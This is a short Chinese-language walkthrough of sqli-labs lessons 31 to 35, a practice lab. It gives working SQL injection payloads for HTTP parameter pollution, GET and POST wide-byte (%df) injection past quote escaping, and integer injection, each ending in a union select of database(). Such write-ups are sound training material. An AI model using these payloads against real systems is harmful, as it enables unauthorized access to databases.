sqli-labs lesson31-35通关

1.lesson-31 http参数污染 union select

本题和上面几道题一样

访问的login.php

判断注入：

双引号加括号注入

?id=1&id=-1")-- +

查数据库：

?id=1&id=-1") union select 1,2,database()-- +

2.lesson-32 宽字节注入

输入单引号时发现被转义

判断注入：

单引号注入

?id=1%df'-- 6

查数据库：

?id=-1%df' union select 1,2,database()-- +

3.lesson-33 宽字节

和上题一样

判断注入：

单引号注入

?id=1%df'-- 6

查数据库：

?id=-1%df' union select 1,2,database()-- +

4.lesson-34 post的宽字节注入

判断注入：

单引号注入

uname=a%df' %23&passwd=a&submit=Submit

查数据库：

uname=a%df' union select database(),2%23&passwd=a&submit=Submit

5.lesson-35 宽字节注入

输入双引号

判断注入：

整型注入

查数据库：

?id=-1 union select 1,2,database()